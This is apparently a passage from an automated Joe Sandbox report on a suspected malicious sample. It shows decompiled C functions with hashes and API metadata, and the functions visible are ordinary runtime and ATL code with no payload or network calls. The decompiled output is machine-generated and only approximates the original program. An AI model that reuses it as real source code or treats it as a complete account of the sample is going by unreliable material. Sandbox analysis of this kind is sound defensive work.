    • API ID: CharNext$Task$Free$AllocH_prolog3__strlenlstrcmpi
    • String ID: {
    • API String ID: 200014448-366298937
    • Opcode ID: cc7111aa3afaa72636b81be0e413faf70e9a5ec204daa3ebc3c9d661dd6eeb1d
    • Instruction ID: ca3dce14f9e7b4b1cdbe3f56dcab152a343deb207d847c57d912e97fafe9a4f7
    • Opcode Fuzzy Hash: cc7111aa3afaa72636b81be0e413faf70e9a5ec204daa3ebc3c9d661dd6eeb1d
    • Instruction Fuzzy Hash: 3431C431E002659FCF229B68CC40BDEBBA5AF4E321F041199EA48FB241D7B4EDC48B50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00EA1DBF(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
    				void* _t16;
    				void* _t20;
    				void* _t21;
    				void* _t28;
    				void* _t29;
    				intOrPtr* _t42;
    				void* _t43;
    				void* _t44;
    				void* _t45;
    
    				_t40 = __edi;
    				_push(0x10);
    				E00EB0216(0xeb07fb, __ebx, __edi, __esi);
    				_t28 = __edx;
    				 *((intOrPtr*)(_t43 - 0x1c)) = __ecx;
    				_t42 = 0;
    				 *((intOrPtr*)(_t43 - 0x18)) = 0;
    				 *((intOrPtr*)(_t43 - 4)) = 0;
    				_t15 = E00EA75E7(L"REGISTRY") + 1;
    				 *((intOrPtr*)(_t43 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
    				_t16 = E00EA1181(_t43 - 0x14, _t15);
    				_t45 = _t44 + 4;
    				if(_t16 < 0) {
    					L7:
    					_t29 = 0x8007000e;
    				} else {
    					_t40 =  *((intOrPtr*)(_t43 - 0x14));
    					_t49 = _t40 - 0x400;
    					if(_t40 > 0x400 || E00EA11AE(_t28, _t40, _t40, 0, _t49) == 0) {
    						_t20 = E00EA3CD7(_t43 - 0x18, _t42, _t40);
    						_t42 =  *((intOrPtr*)(_t43 - 0x18));
    					} else {
    						E00EB02F0(_t40);
    						_t20 = _t45;
    					}
    					_t21 = E00EA1251(_t20, L"REGISTRY", _t40, 3);
    					_t51 = _t21;
    					if(_t21 == 0) {
    						goto L7;
    					} else {
    						_t29 = E00EA1B39(_t28,  *((intOrPtr*)(_t43 - 0x1c)), _t40, _t42, _t51, _t28,  *(_t43 + 8) & 0x0000ffff, _t21, 1);
    					}
    				}
    				if(_t42 != 0) {
    					do {
    						_t40 =  *_t42;
    						_t42 = _t40;
    						E00EA7188(_t42);
    					} while (_t40 != 0);
    				}
    				return E00EB01C5(_t29, _t40, _t42);
    			}


    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1DC6
      • Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1
    • __alloca_probe_16.LIBCMT ref: 00EA1E0F
    Strings
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    • Opcode ID: b739fae44898f3a7cf420f4c78028bc621d3d3c4ccaa2652ecae79d36c94ffdd
    • Instruction ID: ee4224d188c0dd0207c8d8caf3a88e29fe7a3962ef97177493a47771592d5ceb
    • Opcode Fuzzy Hash: b739fae44898f3a7cf420f4c78028bc621d3d3c4ccaa2652ecae79d36c94ffdd
    • Instruction Fuzzy Hash: FF11A732F0121557CB10ABA488426FFB2E59F9E754F14A055FE42BF242EA74FD4187E1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00EA1F97(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr* __edi, void* __esi, void* __eflags) {
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t29;
    				void* _t30;
    				intOrPtr* _t43;
    				void* _t44;
    				void* _t45;
    				void* _t46;
    
    				_t41 = __edi;
    				_push(0x10);
    				E00EB0216(0xeb07fb, __ebx, __edi, __esi);
    				_t29 = __edx;
    				 *((intOrPtr*)(_t44 - 0x1c)) = __ecx;
    				_t43 = 0;
    				 *((intOrPtr*)(_t44 - 0x18)) = 0;
    				 *(_t44 - 4) =  *(_t44 - 4) & 0;
    				_t16 = E00EA75E7(L"REGISTRY") + 1;
    				 *((intOrPtr*)(_t44 - 0x14)) = E00EA75E7(L"REGISTRY") + 1;
    				_t17 = E00EA1181(_t44 - 0x14, _t16);
    				_t46 = _t45 + 4;
    				if(_t17 < 0) {
    					L7:
    					_t30 = 0x8007000e;
    				} else {
    					_t41 =  *((intOrPtr*)(_t44 - 0x14));
    					_t50 = _t41 - 0x400;
    					if(_t41 > 0x400 || E00EA11AE(_t29, _t41, _t41, 0, _t50) == 0) {
    						_t21 = E00EA3CD7(_t44 - 0x18, _t43, _t41);
    						_t43 =  *((intOrPtr*)(_t44 - 0x18));
    					} else {
    						E00EB02F0(_t41);
    						_t21 = _t46;
    					}
    					_t22 = E00EA1251(_t21, L"REGISTRY", _t41, 3);
    					_t52 = _t22;
    					if(_t22 == 0) {
    						goto L7;
    					} else {
    						_t30 = E00EA1B39(_t29,  *((intOrPtr*)(_t44 - 0x1c)), _t41, _t43, _t52, _t29,  *(_t44 + 8) & 0x0000ffff, _t22, 0);
    					}
    				}
    				if(_t43 != 0) {
    					do {
    						_t41 =  *_t43;
    						_t43 = _t41;
    						E00EA7188(_t43);
    					} while (_t41 != 0);
    				}
    				return E00EB01C5(_t30, _t41, _t43);
    			}


    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00EA1F9E
      • Part of subcall function 00EA11AE: __alloca_probe_16.LIBCMT ref: 00EA11D1
    • __alloca_probe_16.LIBCMT ref: 00EA1FE7
    Strings
    Similarity
    • API ID: __alloca_probe_16$H_prolog3_
    • String ID: REGISTRY
    • API String ID: 2219512784-194740550
    • Opcode ID: 0f5d760dedf7c278e9a672447b200ef3de977c9f20c4f22bd5dd62dfad0774b2
    • Instruction ID: f0a98b3b79c351279766c5977685376828f8ba8cbf9f75f7684e30424bf01183
    • Opcode Fuzzy Hash: 0f5d760dedf7c278e9a672447b200ef3de977c9f20c4f22bd5dd62dfad0774b2
    • Instruction Fuzzy Hash: 8911EB36F001559BCB14EAA888426FF72E59F4E754F10605ABB41BF242EA74FD01C7E0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00EA4408(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
    				char _v0;
    				void* _v800;
    				int _t7;
    				intOrPtr _t12;
    				signed int _t13;
    				intOrPtr _t16;
    				char _t17;
    				intOrPtr _t19;
    				intOrPtr _t20;
    				intOrPtr _t21;
    				intOrPtr* _t22;
    
    				_t21 = __esi;
    				_t20 = __edi;
    				_t19 = __edx;
    				_t16 = __ebx;
    				_t7 = IsProcessorFeaturePresent(0x17);
    				if(_t7 != 0) {
    					_t17 = _a4;
    					asm("int 0x29");
    				}
    				 *0xfe2508 = _t7;
    				 *0xfe2504 = _t17;
    				 *0xfe2500 = _t19;
    				 *0xfe24fc = _t16;
    				 *0xfe24f8 = _t21;
    				 *0xfe24f4 = _t20;
    				 *0xfe2520 = ss;
    				 *0xfe2514 = cs;
    				 *0xfe24f0 = ds;
    				 *0xfe24ec = es;
    				 *0xfe24e8 = fs;
    				 *0xfe24e4 = gs;
    				asm("pushfd");
    				_pop( *0xfe2518);
    				 *0xfe250c =  *_t22;
    				_t2 =  &_v0; // 0xea3761
    				 *0xfe2510 =  *_t2;
    				 *0xfe251c =  &_a4;
    				_t12 =  *0xfe2510; // 0x0
    				 *0xfe2414 = _t12;
    				 *0xfe2408 = 0xc0000409;
    				 *0xfe240c = 1;
    				 *0xfe2418 = 1;
    				_t13 = 4;
    				 *((intOrPtr*)(0xfe241c + _t13 * 0)) = _a4;
    				return E00EA42DA(0xeb137c);
    			}


    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00EA4413
    • ___raise_securityfailure.LIBCMT ref: 00EA44D0
    Strings
    Similarity
    • API ID: FeaturePresentProcessor___raise_securityfailure
    • String ID: a7
    • API String ID: 3761405300-2076148515
    • Opcode ID: 88105dfb166f8bb154327dcf4e11b35f2027e0a4a7fe4a9071144122a2ef3fe8
    • Instruction ID: 4e1c090eb71a0b9bc4ab96b3e50c9e178f21381f56761341a25826c9af1a8ac7
    • Opcode Fuzzy Hash: 88105dfb166f8bb154327dcf4e11b35f2027e0a4a7fe4a9071144122a2ef3fe8
    • Instruction Fuzzy Hash: 691193B451038CDAD794DF15FED1A443BADBB48300B04A06AE9088F3A2F7B05645AF95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00EA999F(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				intOrPtr* _t11;
    
    				_t11 = E00EA97BE(0x12, "InitializeCriticalSectionEx", 0xeb2af4, 0xeb2afc);
    				if(_t11 == 0) {
    					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
    				}
    				 *0xeb1278(_a4, _a8, _a12);
    				return  *_t11();
    			}





    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00EA94F8), ref: 00EA99DF
    Strings
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: "G$InitializeCriticalSectionEx
    • API String ID: 2593887523-1819412833
    • Opcode ID: 1f1a57fe3f8ae8bb1cabcdbb6340ad556097b6eda0e0a2518cad7495547768f1
    • Instruction ID: e31a98991ecb826e97ba5bcef94280378a02612958fe1f3d36afe8dc49d154c5
    • Opcode Fuzzy Hash: 1f1a57fe3f8ae8bb1cabcdbb6340ad556097b6eda0e0a2518cad7495547768f1
    • Instruction Fuzzy Hash: 3CE09236540318BBCF222F51CC05CDF3F16DF49770F405225FE1979261DAB18820A6D0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00EA98A0(void* __eflags, intOrPtr _a4) {
    				intOrPtr* _t7;
    
    				_t7 = E00EA97BE(3, "FlsAlloc", 0xeb2ad4, 0xeb2adc);
    				if(_t7 == 0) {
    					return TlsAlloc();
    				}
    				 *0xeb1278(_a4);
    				return  *_t7();
    			}





    APIs
    Strings
    Similarity
    • API ID: Alloc
    • String ID: "G$FlsAlloc
    • API String ID: 2773662609-571099555
    • Opcode ID: 6af87f5cf97ed42e1859d4c9d0e64c35bc26d59fcb98b674e7de0a9c1086dbf8
    • Instruction ID: fbbce4c6f94b1fb64bc3211587df99232e331b28639c5e47bad863155a86e0e9
    • Opcode Fuzzy Hash: 6af87f5cf97ed42e1859d4c9d0e64c35bc26d59fcb98b674e7de0a9c1086dbf8
    • Instruction Fuzzy Hash: DFE0C2316803246B862536A59C169DB7E08CF46BB0B811161FA057A692DAA4584143D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00EA3F8E(intOrPtr* __ecx, void* __eflags) {
    				intOrPtr* _t13;
    
    				_t13 = __ecx;
    				E00EA3FE1(__ecx);
    				 *__ecx = 0x38;
    				 *((intOrPtr*)(__ecx + 8)) = 0xea0000;
    				 *((intOrPtr*)(__ecx + 4)) = 0xea0000;
    				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
    				 *((intOrPtr*)(__ecx + 0x10)) = 0xeb12e0;
    				if(E00EA10C5(0xea0000, __ecx + 0x14) < 0) {
    					if(IsDebuggerPresent() != 0) {
    						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
    					}
    					 *0xfe2df9 = 1;
    				}
    				return _t13;
    			}





    APIs
      • Part of subcall function 00EA10C5: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10CB
      • Part of subcall function 00EA10C5: GetLastError.KERNEL32(?,00000000,00000000,?,?,00EB7488), ref: 00EA10D5
    • IsDebuggerPresent.KERNEL32(?,?,?,00EA106D), ref: 00EA3FC1
    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00EA106D), ref: 00EA3FD0
    Strings
    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00EA3FCB
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
    • API String ID: 3511171328-631824599
    • Opcode ID: ae0208b0e927187094bdf9d320a05f211600230c7899f5b88493b6b9b894a0ac
    • Instruction ID: 6fec5c2f163145aeee14a05c1cd134b78528769b5ae2a6844e1cd83e1b486e58
    • Opcode Fuzzy Hash: ae0208b0e927187094bdf9d320a05f211600230c7899f5b88493b6b9b894a0ac
    • Instruction Fuzzy Hash: B6E0A9347003408FD3249F36E8083837AE1AF0A394F40989DE482EA260E7B0A5488B90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00EA21F6(CHAR* __ecx, short* __edx) {
    				CHAR* _t12;
    				short* _t13;
    
    				_t12 = __ecx;
    				_t13 = __edx;
    				if(lstrcmpiA(__ecx, 0xeb5ebc) != 0) {
    					if(lstrcmpiA(_t12, 0xeb5ec0) != 0) {
    						if(lstrcmpiA(_t12, 0xeb5ec4) != 0) {
    							if(lstrcmpiA(_t12, 0xeb5ec8) != 0) {
    								 *_t13 = 0;
    								return 0;
    							}
    							_push(0x11);
    							L2:
    							_pop(0x4008);
    							L3:
    							 *_t13 = 0x4008;
    							return 1;
    						}
    						_push(0x13);
    						goto L2;
    					}
    					goto L3;
    				}
    				_push(8);
    				goto L2;
    			}






    APIs
    • lstrcmpiA.KERNEL32(?,00EB5EBC,?,00000000,00000000,00EA24CA,?,64E1D101,?,00000000,?,?,?,00EB088D,000000FF), ref: 00EA2209
    • lstrcmpiA.KERNEL32(?,00EB5EC0,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA2220
    • lstrcmpiA.KERNEL32(?,00EB5EC4,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA2233
    • lstrcmpiA.KERNEL32(?,00EB5EC8,?,00EA3194,?,00000000,?,?,?,?,0002001F), ref: 00EA2243
    Memory Dump Source
    • Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
    • Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd
    Similarity
    • API ID: lstrcmpi
    • String ID:
    • API String ID: 1586166983-0
    • Opcode ID: 56e07c4e577babeb3f00b9ee7a5b09e8964a58161b145a8ec8304244b656716f
    • Instruction ID: 9760f773bec9fe7319603ae571696788523bc0bb61cdeaf2d87d39255e85df85
    • Opcode Fuzzy Hash: 56e07c4e577babeb3f00b9ee7a5b09e8964a58161b145a8ec8304244b656716f
    • Instruction Fuzzy Hash: AEF08232384703B2D220116D5C91FBB01985F9FB55B20603EF745FA0A0E650FC413235
    Uniqueness

    Uniqueness Score: -1.00%